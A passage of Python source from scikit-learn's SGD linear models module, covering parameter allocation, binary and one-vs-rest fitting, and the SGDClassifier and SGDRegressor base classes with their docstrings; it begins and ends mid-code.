intercept_init = np.asarray(intercept_init, order="C")
if intercept_init.shape != (n_classes, ):
raise ValueError("Provided intercept_init "
"does not match dataset.")
self.intercept_ = intercept_init
else:
self.intercept_ = np.zeros(n_classes, dtype=np.float64,
order="C")
else:
# allocate coef_ for binary problem
if coef_init is not None:
coef_init = np.asarray(coef_init, dtype=np.float64,
order="C")
coef_init = coef_init.ravel()
if coef_init.shape != (n_features,):
raise ValueError("Provided coef_init does not "
"match dataset.")
self.coef_ = coef_init
else:
self.coef_ = np.zeros(n_features,
dtype=np.float64,
order="C")
# allocate intercept_ for binary problem
if intercept_init is not None:
intercept_init = np.asarray(intercept_init, dtype=np.float64)
if intercept_init.shape != (1,) and intercept_init.shape != ():
raise ValueError("Provided intercept_init "
"does not match dataset.")
self.intercept_ = intercept_init.reshape(1,)
else:
self.intercept_ = np.zeros(1, dtype=np.float64, order="C")
# initialize average parameters
if self.average > 0:
self._standard_coef = self.coef_
self._standard_intercept = self.intercept_
self._average_coef = np.zeros(self.coef_.shape,
dtype=np.float64,
order="C")
self._average_intercept = np.zeros(self._standard_intercept.shape,
dtype=np.float64,
order="C")
def _make_validation_split(self, y):
"""Split the dataset between training set and validation set.
Parameters
----------
y : ndarray of shape (n_samples, )
Target values.
Returns
-------
validation_mask : ndarray of shape (n_samples, )
Equal to 1 on the validation set, 0 on the training set.
"""
n_samples = y.shape[0]
validation_mask = np.zeros(n_samples, dtype=np.uint8)
if not self.early_stopping:
# use the full set for training, with an empty validation set
return validation_mask
if is_classifier(self):
splitter_type = StratifiedShuffleSplit
else:
splitter_type = ShuffleSplit
cv = splitter_type(test_size=self.validation_fraction,
random_state=self.random_state)
idx_train, idx_val = next(cv.split(np.zeros(shape=(y.shape[0], 1)), y))
if idx_train.shape[0] == 0 or idx_val.shape[0] == 0:
raise ValueError(
"Splitting %d samples into a train set and a validation set "
"with validation_fraction=%r led to an empty set (%d and %d "
"samples). Please either change validation_fraction, increase "
"number of samples, or disable early_stopping."
% (n_samples, self.validation_fraction, idx_train.shape[0],
idx_val.shape[0]))
validation_mask[idx_val] = 1
return validation_mask
def _make_validation_score_cb(self, validation_mask, X, y, sample_weight,
classes=None):
if not self.early_stopping:
return None
return _ValidationScoreCallback(
self, X[validation_mask], y[validation_mask],
sample_weight[validation_mask], classes=classes)
# mypy error: Decorated property not supported
@deprecated("Attribute standard_coef_ was deprecated " # type: ignore
"in version 0.23 and will be removed in 0.25.")
@property
def standard_coef_(self):
return self._standard_coef
# mypy error: Decorated property not supported
@deprecated( # type: ignore
"Attribute standard_intercept_ was deprecated "
"in version 0.23 and will be removed in 0.25."
)
@property
def standard_intercept_(self):
return self._standard_intercept
# mypy error: Decorated property not supported
@deprecated("Attribute average_coef_ was deprecated " # type: ignore
"in version 0.23 and will be removed in 0.25.")
@property
def average_coef_(self):
return self._average_coef
# mypy error: Decorated property not supported
@deprecated("Attribute average_intercept_ was deprecated " # type: ignore
"in version 0.23 and will be removed in 0.25.")
@property
def average_intercept_(self):
return self._average_intercept
def _prepare_fit_binary(est, y, i):
"""Initialization for fit_binary.
Returns y, coef, intercept, average_coef, average_intercept.
"""
y_i = np.ones(y.shape, dtype=np.float64, order="C")
y_i[y != est.classes_[i]] = -1.0
average_intercept = 0
average_coef = None
if len(est.classes_) == 2:
if not est.average:
coef = est.coef_.ravel()
intercept = est.intercept_[0]
else:
coef = est._standard_coef.ravel()
intercept = est._standard_intercept[0]
average_coef = est._average_coef.ravel()
average_intercept = est._average_intercept[0]
else:
if not est.average:
coef = est.coef_[i]
intercept = est.intercept_[i]
else:
coef = est._standard_coef[i]
intercept = est._standard_intercept[i]
average_coef = est._average_coef[i]
average_intercept = est._average_intercept[i]
return y_i, coef, intercept, average_coef, average_intercept
def fit_binary(est, i, X, y, alpha, C, learning_rate, max_iter,
pos_weight, neg_weight, sample_weight, validation_mask=None,
random_state=None):
"""Fit a single binary classifier.
The i'th class is considered the "positive" class.
Parameters
----------
est : Estimator object
The estimator to fit
i : int
Index of the positive class
X : numpy array or sparse matrix of shape [n_samples,n_features]
Training data
y : numpy array of shape [n_samples, ]
Target values
alpha : float
The regularization parameter
C : float
Maximum step size for passive aggressive
learning_rate : string
The learning rate. Accepted values are 'constant', 'optimal',
'invscaling', 'pa1' and 'pa2'.
max_iter : int
The maximum number of iterations (epochs)
pos_weight : float
The weight of the positive class
neg_weight : float
The weight of the negative class
sample_weight : numpy array of shape [n_samples, ]
The weight of each sample
validation_mask : numpy array of shape [n_samples, ], default=None
Precomputed validation mask in case _fit_binary is called in the
context of a one-vs-rest reduction.
random_state : int, RandomState instance, default=None
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
# if average is not true, average_coef, and average_intercept will be
# unused
y_i, coef, intercept, average_coef, average_intercept = \
_prepare_fit_binary(est, y, i)
assert y_i.shape[0] == y.shape[0] == sample_weight.shape[0]
random_state = check_random_state(random_state)
dataset, intercept_decay = make_dataset(
X, y_i, sample_weight, random_state=random_state)
penalty_type = est._get_penalty_type(est.penalty)
learning_rate_type = est._get_learning_rate_type(learning_rate)
if validation_mask is None:
validation_mask = est._make_validation_split(y_i)
classes = np.array([-1, 1], dtype=y_i.dtype)
validation_score_cb = est._make_validation_score_cb(
validation_mask, X, y_i, sample_weight, classes=classes)
# numpy mtrand expects a C long which is a signed 32 bit integer under
# Windows
seed = random_state.randint(MAX_INT)
tol = est.tol if est.tol is not None else -np.inf
coef, intercept, average_coef, average_intercept, n_iter_ = _plain_sgd(
coef, intercept, average_coef, average_intercept, est.loss_function_,
penalty_type, alpha, C, est.l1_ratio, dataset, validation_mask,
est.early_stopping, validation_score_cb, int(est.n_iter_no_change),
max_iter, tol, int(est.fit_intercept), int(est.verbose),
int(est.shuffle), seed, pos_weight, neg_weight, learning_rate_type,
est.eta0, est.power_t, est.t_, intercept_decay, est.average)
if est.average:
if len(est.classes_) == 2:
est._average_intercept[0] = average_intercept
else:
est._average_intercept[i] = average_intercept
return coef, intercept, n_iter_
class BaseSGDClassifier(LinearClassifierMixin, BaseSGD, metaclass=ABCMeta):
loss_functions = {
"hinge": (Hinge, 1.0),
"squared_hinge": (SquaredHinge, 1.0),
"perceptron": (Hinge, 0.0),
"log": (Log, ),
"modified_huber": (ModifiedHuber, ),
"squared_loss": (SquaredLoss, ),
"huber": (Huber, DEFAULT_EPSILON),
"epsilon_insensitive": (EpsilonInsensitive, DEFAULT_EPSILON),
"squared_epsilon_insensitive": (SquaredEpsilonInsensitive,
DEFAULT_EPSILON),
}
@abstractmethod
@_deprecate_positional_args
def __init__(self, loss="hinge", *, penalty='l2', alpha=0.0001,
l1_ratio=0.15, fit_intercept=True, max_iter=1000, tol=1e-3,
shuffle=True, verbose=0, epsilon=DEFAULT_EPSILON, n_jobs=None,
random_state=None, learning_rate="optimal", eta0=0.0,
power_t=0.5, early_stopping=False,
validation_fraction=0.1, n_iter_no_change=5,
class_weight=None, warm_start=False, average=False):
super().__init__(
loss=loss, penalty=penalty, alpha=alpha, l1_ratio=l1_ratio,
fit_intercept=fit_intercept, max_iter=max_iter, tol=tol,
shuffle=shuffle, verbose=verbose, epsilon=epsilon,
random_state=random_state, learning_rate=learning_rate, eta0=eta0,
power_t=power_t, early_stopping=early_stopping,
validation_fraction=validation_fraction,
n_iter_no_change=n_iter_no_change, warm_start=warm_start,
average=average)
self.class_weight = class_weight
self.n_jobs = n_jobs
def _partial_fit(self, X, y, alpha, C,
loss, learning_rate, max_iter,
classes, sample_weight,
coef_init, intercept_init):
X, y = check_X_y(X, y, accept_sparse='csr', dtype=np.float64,
order="C", accept_large_sparse=False)
n_samples, n_features = X.shape
_check_partial_fit_first_call(self, classes)
n_classes = self.classes_.shape[0]
# Allocate datastructures from input arguments
self._expanded_class_weight = compute_class_weight(
self.class_weight, classes=self.classes_, y=y)
sample_weight = _check_sample_weight(sample_weight, X)
if getattr(self, "coef_", None) is None or coef_init is not None:
self._allocate_parameter_mem(n_classes, n_features,
coef_init, intercept_init)
elif n_features != self.coef_.shape[-1]:
raise ValueError("Number of features %d does not match previous "
"data %d." % (n_features, self.coef_.shape[-1]))
self.loss_function_ = self._get_loss_function(loss)
if not hasattr(self, "t_"):
self.t_ = 1.0
# delegate to concrete training procedure
if n_classes > 2:
self._fit_multiclass(X, y, alpha=alpha, C=C,
learning_rate=learning_rate,
sample_weight=sample_weight,
max_iter=max_iter)
elif n_classes == 2:
self._fit_binary(X, y, alpha=alpha, C=C,
learning_rate=learning_rate,
sample_weight=sample_weight,
max_iter=max_iter)
else:
raise ValueError(
"The number of classes has to be greater than one;"
" got %d class" % n_classes)
return self
def _fit(self, X, y, alpha, C, loss, learning_rate, coef_init=None,
intercept_init=None, sample_weight=None):
self._validate_params()
if hasattr(self, "classes_"):
self.classes_ = None
X, y = self._validate_data(X, y, accept_sparse='csr',
dtype=np.float64, order="C",
accept_large_sparse=False)
# labels can be encoded as float, int, or string literals
# np.unique sorts in asc order; largest class id is positive class
classes = np.unique(y)
if self.warm_start and hasattr(self, "coef_"):
if coef_init is None:
coef_init = self.coef_
if intercept_init is None:
intercept_init = self.intercept_
else:
self.coef_ = None
self.intercept_ = None
if self.average > 0:
self._standard_coef = self.coef_
self._standard_intercept = self.intercept_
self._average_coef = None
self._average_intercept = None
# Clear iteration count for multiple call to fit.
self.t_ = 1.0
self._partial_fit(X, y, alpha, C, loss, learning_rate, self.max_iter,
classes, sample_weight, coef_init, intercept_init)
if (self.tol is not None and self.tol > -np.inf
and self.n_iter_ == self.max_iter):
warnings.warn("Maximum number of iteration reached before "
"convergence. Consider increasing max_iter to "
"improve the fit.",
ConvergenceWarning)
return self
def _fit_binary(self, X, y, alpha, C, sample_weight,
learning_rate, max_iter):
"""Fit a binary classifier on X and y. """
coef, intercept, n_iter_ = fit_binary(self, 1, X, y, alpha, C,
learning_rate, max_iter,
self._expanded_class_weight[1],
self._expanded_class_weight[0],
sample_weight,
random_state=self.random_state)
self.t_ += n_iter_ * X.shape[0]
self.n_iter_ = n_iter_
# need to be 2d
if self.average > 0:
if self.average <= self.t_ - 1:
self.coef_ = self._average_coef.reshape(1, -1)
self.intercept_ = self._average_intercept
else:
self.coef_ = self._standard_coef.reshape(1, -1)
self._standard_intercept = np.atleast_1d(intercept)
self.intercept_ = self._standard_intercept
else:
self.coef_ = coef.reshape(1, -1)
# intercept is a float, need to convert it to an array of length 1
self.intercept_ = np.atleast_1d(intercept)
def _fit_multiclass(self, X, y, alpha, C, learning_rate,
sample_weight, max_iter):
"""Fit a multi-class classifier by combining binary classifiers
Each binary classifier predicts one class versus all others. This
strategy is called OvA (One versus All) or OvR (One versus Rest).
"""
# Precompute the validation split using the multiclass labels
# to ensure proper balancing of the classes.
validation_mask = self._make_validation_split(y)
# Use joblib to fit OvA in parallel.
# Pick the random seed for each job outside of fit_binary to avoid
# sharing the estimator random state between threads which could lead
# to non-deterministic behavior
random_state = check_random_state(self.random_state)
seeds = random_state.randint(MAX_INT, size=len(self.classes_))
result = Parallel(n_jobs=self.n_jobs, verbose=self.verbose,
**_joblib_parallel_args(require="sharedmem"))(
delayed(fit_binary)(self, i, X, y, alpha, C, learning_rate,
max_iter, self._expanded_class_weight[i],
1., sample_weight,
validation_mask=validation_mask,
random_state=seed)
for i, seed in enumerate(seeds))
# take the maximum of n_iter_ over every binary fit
n_iter_ = 0.
for i, (_, intercept, n_iter_i) in enumerate(result):
self.intercept_[i] = intercept
n_iter_ = max(n_iter_, n_iter_i)
self.t_ += n_iter_ * X.shape[0]
self.n_iter_ = n_iter_
if self.average > 0:
if self.average <= self.t_ - 1.0:
self.coef_ = self._average_coef
self.intercept_ = self._average_intercept
else:
self.coef_ = self._standard_coef
self._standard_intercept = np.atleast_1d(self.intercept_)
self.intercept_ = self._standard_intercept
def partial_fit(self, X, y, classes=None, sample_weight=None):
"""Perform one epoch of stochastic gradient descent on given samples.
Internally, this method uses ``max_iter = 1``. Therefore, it is not
guaranteed that a minimum of the cost function is reached after calling
it once. Matters such as objective convergence and early stopping
should be handled by the user.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Subset of the training data.
y : ndarray of shape (n_samples,)
Subset of the target values.
classes : ndarray of shape (n_classes,), default=None
Classes across all calls to partial_fit.
Can be obtained by via `np.unique(y_all)`, where y_all is the
target vector of the entire dataset.
This argument is required for the first call to partial_fit
and can be omitted in the subsequent calls.
Note that y doesn't need to contain all labels in `classes`.
sample_weight : array-like, shape (n_samples,), default=None
Weights applied to individual samples.
If not provided, uniform weights are assumed.
Returns
-------
self :
Returns an instance of self.
"""
self._validate_params(for_partial_fit=True)
if self.class_weight in ['balanced']:
raise ValueError("class_weight '{0}' is not supported for "
"partial_fit. In order to use 'balanced' weights,"
" use compute_class_weight('{0}', "
"classes=classes, y=y). "
"In place of y you can us a large enough sample "
"of the full training set target to properly "
"estimate the class frequency distributions. "
"Pass the resulting weights as the class_weight "
"parameter.".format(self.class_weight))
return self._partial_fit(X, y, alpha=self.alpha, C=1.0, loss=self.loss,
learning_rate=self.learning_rate, max_iter=1,
classes=classes, sample_weight=sample_weight,
coef_init=None, intercept_init=None)
def fit(self, X, y, coef_init=None, intercept_init=None,
sample_weight=None):
"""Fit linear model with Stochastic Gradient Descent.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data.
y : ndarray of shape (n_samples,)
Target values.
coef_init : ndarray of shape (n_classes, n_features), default=None
The initial coefficients to warm-start the optimization.
intercept_init : ndarray of shape (n_classes,), default=None
The initial intercept to warm-start the optimization.
sample_weight : array-like, shape (n_samples,), default=None
Weights applied to individual samples.
If not provided, uniform weights are assumed. These weights will
be multiplied with class_weight (passed through the
constructor) if class_weight is specified.
Returns
-------
self :
Returns an instance of self.
"""
return self._fit(X, y, alpha=self.alpha, C=1.0,
loss=self.loss, learning_rate=self.learning_rate,
coef_init=coef_init, intercept_init=intercept_init,
sample_weight=sample_weight)
class SGDClassifier(BaseSGDClassifier):
"""Linear classifiers (SVM, logistic regression, etc.) with SGD training.
This estimator implements regularized linear models with stochastic
gradient descent (SGD) learning: the gradient of the loss is estimated
each sample at a time and the model is updated along the way with a
decreasing strength schedule (aka learning rate). SGD allows minibatch
(online/out-of-core) learning via the `partial_fit` method.
For best results using the default learning rate schedule, the data should
have zero mean and unit variance.
This implementation works with data represented as dense or sparse arrays
of floating point values for the features. The model it fits can be
controlled with the loss parameter; by default, it fits a linear support
vector machine (SVM).
The regularizer is a penalty added to the loss function that shrinks model
parameters towards the zero vector using either the squared euclidean norm
L2 or the absolute norm L1 or a combination of both (Elastic Net). If the
parameter update crosses the 0.0 value because of the regularizer, the
update is truncated to 0.0 to allow for learning sparse models and achieve
online feature selection.
Read more in the :ref:`User Guide <sgd>`.
Parameters
----------
loss : str, default='hinge'
The loss function to be used. Defaults to 'hinge', which gives a
linear SVM.
The possible options are 'hinge', 'log', 'modified_huber',
'squared_hinge', 'perceptron', or a regression loss: 'squared_loss',
'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'.
The 'log' loss gives logistic regression, a probabilistic classifier.
'modified_huber' is another smooth loss that brings tolerance to
outliers as well as probability estimates.
'squared_hinge' is like hinge but is quadratically penalized.
'perceptron' is the linear loss used by the perceptron algorithm.
The other losses are designed for regression but can be useful in
classification as well; see
:class:`~sklearn.linear_model.SGDRegressor` for a description.
More details about the losses formulas can be found in the
:ref:`User Guide <sgd_mathematical_formulation>`.
penalty : {'l2', 'l1', 'elasticnet'}, default='l2'
The penalty (aka regularization term) to be used. Defaults to 'l2'
which is the standard regularizer for linear SVM models. 'l1' and
'elasticnet' might bring sparsity to the model (feature selection)
not achievable with 'l2'.
alpha : float, default=0.0001
Constant that multiplies the regularization term. The higher the
value, the stronger the regularization.
Also used to compute the learning rate when set to `learning_rate` is
set to 'optimal'.
l1_ratio : float, default=0.15
The Elastic Net mixing parameter, with 0 <= l1_ratio <= 1.
l1_ratio=0 corresponds to L2 penalty, l1_ratio=1 to L1.
Only used if `penalty` is 'elasticnet'.
fit_intercept : bool, default=True
Whether the intercept should be estimated or not. If False, the
data is assumed to be already centered.
max_iter : int, default=1000
The maximum number of passes over the training data (aka epochs).
It only impacts the behavior in the ``fit`` method, and not the
:meth:`partial_fit` method.
.. versionadded:: 0.19
tol : float, default=1e-3
The stopping criterion. If it is not None, training will stop
when (loss > best_loss - tol) for ``n_iter_no_change`` consecutive
epochs.
.. versionadded:: 0.19
shuffle : bool, default=True
Whether or not the training data should be shuffled after each epoch.
verbose : int, default=0
The verbosity level.
epsilon : float, default=0.1
Epsilon in the epsilon-insensitive loss functions; only if `loss` is
'huber', 'epsilon_insensitive', or 'squared_epsilon_insensitive'.
For 'huber', determines the threshold at which it becomes less
important to get the prediction exactly right.
For epsilon-insensitive, any differences between the current prediction
and the correct label are ignored if they are less than this threshold.
n_jobs : int, default=None
The number of CPUs to use to do the OVA (One Versus All, for
multi-class problems) computation.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
random_state : int, RandomState instance, default=None
Used for shuffling the data, when ``shuffle`` is set to ``True``.
Pass an int for reproducible output across multiple function calls.
See :term:`Glossary <random_state>`.
learning_rate : str, default='optimal'
The learning rate schedule:
- 'constant': `eta = eta0`
- 'optimal': `eta = 1.0 / (alpha * (t + t0))`
where t0 is chosen by a heuristic proposed by Leon Bottou.
- 'invscaling': `eta = eta0 / pow(t, power_t)`
- 'adaptive': eta = eta0, as long as the training keeps decreasing.
Each time n_iter_no_change consecutive epochs fail to decrease the
training loss by tol or fail to increase validation score by tol if
early_stopping is True, the current learning rate is divided by 5.
.. versionadded:: 0.20
Added 'adaptive' option
eta0 : double, default=0.0
The initial learning rate for the 'constant', 'invscaling' or
'adaptive' schedules. The default value is 0.0 as eta0 is not used by
the default schedule 'optimal'.
power_t : double, default=0.5
The exponent for inverse scaling learning rate [default 0.5].
early_stopping : bool, default=False
Whether to use early stopping to terminate training when validation
score is not improving. If set to True, it will automatically set aside
a stratified fraction of training data as validation and terminate
training when validation score returned by the `score` method is not
improving by at least tol for n_iter_no_change consecutive epochs.
.. versionadded:: 0.20
Added 'early_stopping' option
validation_fraction : float, default=0.1
The proportion of training data to set aside as validation set for
early stopping. Must be between 0 and 1.
Only used if `early_stopping` is True.
.. versionadded:: 0.20
Added 'validation_fraction' option
n_iter_no_change : int, default=5
Number of iterations with no improvement to wait before early stopping.
.. versionadded:: 0.20
Added 'n_iter_no_change' option
class_weight : dict, {class_label: weight} or "balanced", default=None
Preset for the class_weight fit parameter.
Weights associated with classes. If not given, all classes
are supposed to have weight one.
The "balanced" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data
as ``n_samples / (n_classes * np.bincount(y))``.
warm_start : bool, default=False
When set to True, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
See :term:`the Glossary <warm_start>`.
Repeatedly calling fit or partial_fit when warm_start is True can
result in a different solution than when calling fit a single time
because of the way the data is shuffled.
If a dynamic learning rate is used, the learning rate is adapted
depending on the number of samples already seen. Calling ``fit`` resets
this counter, while ``partial_fit`` will result in increasing the
existing counter.
average : bool or int, default=False
When set to True, computes the averaged SGD weights accross all
updates and stores the result in the ``coef_`` attribute. If set to
an int greater than 1, averaging will begin once the total number of
samples seen reaches `average`. So ``average=10`` will begin
averaging after seeing 10 samples.
Attributes
----------
coef_ : ndarray of shape (1, n_features) if n_classes == 2 else \
(n_classes, n_features)
Weights assigned to the features.
intercept_ : ndarray of shape (1,) if n_classes == 2 else (n_classes,)
Constants in decision function.
n_iter_ : int
The actual number of iterations before reaching the stopping criterion.
For multiclass fits, it is the maximum over every binary fit.
loss_function_ : concrete ``LossFunction``
classes_ : array of shape (n_classes,)
t_ : int
Number of weight updates performed during training.
Same as ``(n_iter_ * n_samples)``.
See Also
--------
sklearn.svm.LinearSVC : Linear support vector classification.
LogisticRegression : Logistic regression.
Perceptron : Inherits from SGDClassifier. ``Perceptron()`` is equivalent to
``SGDClassifier(loss="perceptron", eta0=1, learning_rate="constant",
penalty=None)``.
Examples
--------
>>> import numpy as np
>>> from sklearn.linear_model import SGDClassifier
>>> from sklearn.preprocessing import StandardScaler
>>> from sklearn.pipeline import make_pipeline
>>> X = np.array([[-1, -1], [-2, -1], [1, 1], [2, 1]])
>>> Y = np.array([1, 1, 2, 2])
>>> # Always scale the input. The most convenient way is to use a pipeline.
>>> clf = make_pipeline(StandardScaler(),
... SGDClassifier(max_iter=1000, tol=1e-3))
>>> clf.fit(X, Y)
Pipeline(steps=[('standardscaler', StandardScaler()),
('sgdclassifier', SGDClassifier())])
>>> print(clf.predict([[-0.8, -1]]))
[1]
"""
@_deprecate_positional_args
def __init__(self, loss="hinge", *, penalty='l2', alpha=0.0001,
l1_ratio=0.15,
fit_intercept=True, max_iter=1000, tol=1e-3, shuffle=True,
verbose=0, epsilon=DEFAULT_EPSILON, n_jobs=None,
random_state=None, learning_rate="optimal", eta0=0.0,
power_t=0.5, early_stopping=False, validation_fraction=0.1,
n_iter_no_change=5, class_weight=None, warm_start=False,
average=False):
super().__init__(
loss=loss, penalty=penalty, alpha=alpha, l1_ratio=l1_ratio,
fit_intercept=fit_intercept, max_iter=max_iter, tol=tol,
shuffle=shuffle, verbose=verbose, epsilon=epsilon, n_jobs=n_jobs,
random_state=random_state, learning_rate=learning_rate, eta0=eta0,
power_t=power_t, early_stopping=early_stopping,
validation_fraction=validation_fraction,
n_iter_no_change=n_iter_no_change, class_weight=class_weight,
warm_start=warm_start, average=average)
def _check_proba(self):
if self.loss not in ("log", "modified_huber"):
raise AttributeError("probability estimates are not available for"
" loss=%r" % self.loss)
@property
def predict_proba(self):
"""Probability estimates.
This method is only available for log loss and modified Huber loss.
Multiclass probability estimates are derived from binary (one-vs.-rest)
estimates by simple normalization, as recommended by Zadrozny and
Elkan.
Binary probability estimates for loss="modified_huber" are given by
(clip(decision_function(X), -1, 1) + 1) / 2. For other loss functions
it is necessary to perform proper probability calibration by wrapping
the classifier with
:class:`~sklearn.calibration.CalibratedClassifierCV` instead.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Input data for prediction.
Returns
-------
ndarray of shape (n_samples, n_classes)
Returns the probability of the sample for each class in the model,
where classes are ordered as they are in `self.classes_`.
References
----------
Zadrozny and Elkan, "Transforming classifier scores into multiclass
probability estimates", SIGKDD'02,
http://www.research.ibm.com/people/z/zadrozny/kdd2002-Transf.pdf
The justification for the formula in the loss="modified_huber"
case is in the appendix B in:
http://jmlr.csail.mit.edu/papers/volume2/zhang02c/zhang02c.pdf
"""
self._check_proba()
return self._predict_proba
def _predict_proba(self, X):
check_is_fitted(self)
if self.loss == "log":
return self._predict_proba_lr(X)
elif self.loss == "modified_huber":
binary = (len(self.classes_) == 2)
scores = self.decision_function(X)
if binary:
prob2 = np.ones((scores.shape[0], 2))
prob = prob2[:, 1]
else:
prob = scores
np.clip(scores, -1, 1, prob)
prob += 1.
prob /= 2.
if binary:
prob2[:, 0] -= prob
prob = prob2
else:
# the above might assign zero to all classes, which doesn't
# normalize neatly; work around this to produce uniform
# probabilities
prob_sum = prob.sum(axis=1)
all_zero = (prob_sum == 0)
if np.any(all_zero):
prob[all_zero, :] = 1
prob_sum[all_zero] = len(self.classes_)
# normalize
prob /= prob_sum.reshape((prob.shape[0], -1))
return prob
else:
raise NotImplementedError("predict_(log_)proba only supported when"
" loss='log' or loss='modified_huber' "
"(%r given)" % self.loss)
@property
def predict_log_proba(self):
"""Log of probability estimates.
This method is only available for log loss and modified Huber loss.
When loss="modified_huber", probability estimates may be hard zeros
and ones, so taking the logarithm is not possible.
See ``predict_proba`` for details.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
Input data for prediction.
Returns
-------
T : array-like, shape (n_samples, n_classes)
Returns the log-probability of the sample for each class in the
model, where classes are ordered as they are in
`self.classes_`.
"""
self._check_proba()
return self._predict_log_proba
def _predict_log_proba(self, X):
return np.log(self.predict_proba(X))
def _more_tags(self):
return {
'_xfail_checks': {
'check_sample_weights_invariance':
'zero sample_weight is not equivalent to removing samples',
}
}
class BaseSGDRegressor(RegressorMixin, BaseSGD):
loss_functions = {
"squared_loss": (SquaredLoss, ),
"huber": (Huber, DEFAULT_EPSILON),
"epsilon_insensitive": (EpsilonInsensitive, DEFAULT_EPSILON),
"squared_epsilon_insensitive": (SquaredEpsilonInsensitive,
DEFAULT_EPSILON),
}
@abstractmethod
@_deprecate_positional_args
def __init__(self, loss="squared_loss", *, penalty="l2", alpha=0.0001,
l1_ratio=0.15, fit_intercept=True, max_iter=1000, tol=1e-3,
shuffle=True, verbose=0, epsilon=DEFAULT_EPSILON,
random_state=None, learning_rate="invscaling", eta0=0.01,
power_t=0.25, early_stopping=False, validation_fraction=0.1,
n_iter_no_change=5, warm_start=False, average=False):
super().__init__(
loss=loss, penalty=penalty, alpha=alpha, l1_ratio=l1_ratio,
fit_intercept=fit_intercept, max_iter=max_iter, tol=tol,
shuffle=shuffle, verbose=verbose, epsilon=epsilon,
random_state=random_state, learning_rate=learning_rate, eta0=eta0,
power_t=power_t, early_stopping=early_stopping,
validation_fraction=validation_fraction,
n_iter_no_change=n_iter_no_change, warm_start=warm_start,
average=average)
def _partial_fit(self, X, y, alpha, C, loss, learning_rate,
max_iter, sample_weight, coef_init, intercept_init):
X, y = self._validate_data(X, y, accept_sparse="csr", copy=False,
order='C', dtype=np.float64,
accept_large_sparse=False)
y = y.astype(np.float64, copy=False)
n_samples, n_features = X.shape
sample_weight = _check_sample_weight(sample_weight, X)
# Allocate datastructures from input arguments
if getattr(self, "coef_", None) is None:
self._allocate_parameter_mem(1, n_features, coef_init,
intercept_init)
elif n_features != self.coef_.shape[-1]:
raise ValueError("Number of features %d does not match previous "
"data %d." % (n_features, self.coef_.shape[-1]))
if self.average > 0 and getattr(self, "_average_coef", None) is None:
self._average_coef = np.zeros(n_features,
dtype=np.float64,
order="C")
self._average_intercept = np.zeros(1, dtype=np.float64, order="C")
self._fit_regressor(X, y, alpha, C, loss, learning_rate,
sample_weight, max_iter)
return self
def partial_fit(self, X, y, sample_weight=None):
"""Perform one epoch of stochastic gradient descent on given samples.
Internally, this method uses ``max_iter = 1``. Therefore, it is not
guaranteed that a minimum of the cost function is reached after calling
it once. Matters such as objective convergence and early stopping
should be handled by the user.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Subset of training data
y : numpy array of shape (n_samples,)
Subset of target values
sample_weight : array-like, shape (n_samples,), default=None
Weights applied to individual samples.
If not provided, uniform weights are assumed.
Returns
-------
self : returns an instance of self.
"""
self._validate_params(for_partial_fit=True)
return self._partial_fit(X, y, self.alpha, C=1.0,
loss=self.loss,
learning_rate=self.learning_rate, max_iter=1,
sample_weight=sample_weight, coef_init=None,
intercept_init=None)
def _fit(self, X, y, alpha, C, loss, learning_rate, coef_init=None,
intercept_init=None, sample_weight=None):
self._validate_params()
if self.warm_start and getattr(self, "coef_", None) is not None:
if coef_init is None:
coef_init = self.coef_
if intercept_init is None:
intercept_init = self.intercept_
else:
self.coef_ = None
self.intercept_ = None
# Clear iteration count for multiple call to fit.
self.t_ = 1.0
self._partial_fit(X, y, alpha, C, loss, learning_rate,
self.max_iter, sample_weight, coef_init,
intercept_init)
if (self.tol is not None and self.tol > -np.inf
and self.n_iter_ == self.max_iter):
warnings.warn("Maximum number of iteration reached before "
"convergence. Consider increasing max_iter to "
"improve the fit.",
ConvergenceWarning)
return self
def fit(self, X, y, coef_init=None, intercept_init=None,
sample_weight=None):
"""Fit linear model with Stochastic Gradient Descent.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data
y : ndarray of shape (n_samples,)
Target values
coef_init : ndarray of shape (n_features,), default=None
The initial coefficients to warm-start the optimization.
intercept_init : ndarray of shape (1,), default=None
The initial intercept to warm-start the optimization.
sample_weight : array-like, shape (n_samples,), default=None
Weights applied to individual samples (1. for unweighted).
Returns
-------
self : returns an instance of self.
"""
return self._fit(X, y, alpha=self.alpha, C=1.0,
loss=self.loss, learning_rate=self.learning_rate,
coef_init=coef_init,
intercept_init=intercept_init,
sample_weight=sample_weight)
def _decision_function(self, X):
"""Predict using the linear model
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Returns
-------
ndarray of shape (n_samples,)
Predicted target values per element in X.
"""
check_is_fitted(self)
X = check_array(X, accept_sparse='csr')
scores = safe_sparse_dot(X, self.coef_.T,
dense_output=True) + self.intercept_
return scores.ravel()
def predict(self, X):
"""Predict using the linear model
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Returns
-------
ndarray of shape (n_samples,)
Predicted target values per element in X.
"""
return self._decision_function(X)
def _fit_regressor(self, X, y, alpha, C, loss, learning_rate,
sample_weight, max_iter):
dataset, intercept_decay = make_dataset(X, y, sample_weight)
loss_function = self._get_loss_function(loss)
penalty_type = self._get_penalty_type(self.penalty)
learning_rate_type = self._get_learning_rate_type(learning_rate)
if not hasattr(self, "t_"):
self.t_ = 1.0
validation_mask = self._make_validation_split(y)
validation_score_cb = self._make_validation_score_cb(
validation_mask, X, y, sample_weight)
random_state = check_random_state(self.random_state)
# numpy mtrand expects a C long which is a signed 32 bit integer under
# Windows
seed = random_state.randint(0, np.iinfo(np.int32).max)
tol = self.tol if self.tol is not None else -np.inf
if self.average:
coef = self._standard_coef
intercept = self._standard_intercept
average_coef = self._average_coef
average_intercept = self._average_intercept
else:
coef = self.coef_
intercept = self.intercept_
average_coef = None # Not used
average_intercept = [0] # Not used
coef, intercept, average_coef, average_intercept, self.n_iter_ = \
